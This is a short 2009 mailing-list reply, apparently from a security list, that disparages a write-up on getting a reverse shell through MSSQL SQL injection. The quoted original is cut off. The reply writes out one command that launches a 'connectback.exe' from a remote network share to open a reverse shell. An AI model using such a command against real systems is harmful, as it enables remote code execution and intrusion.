Ferruh,
The script host can be restricted to prevent this 'attack'. Uploading
files to a Windows host has been beaten to death; it's frankly insane
that you ever got booked for some security conference.
But yeah, the last-ditch effort is always NetBIOS; sometimes you even
have to modify the local
Or just
'start \\DiggleSec.com\fredrick\connectback.exe'
would have also been acceptable.
But Fredrick is sure that your 20 page write-up was fantastically entertaining.
On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna fer...@mavituna.com wrote:
This is a different and more practical approach to get a reverse shell
or code execution in SQL Injections (particularly in MSSQL). The idea
is simple. Getting a reverse shell from an SQL Injection with one HTTP
request without using an extra channel such as TFTP, FTP to upload the
initial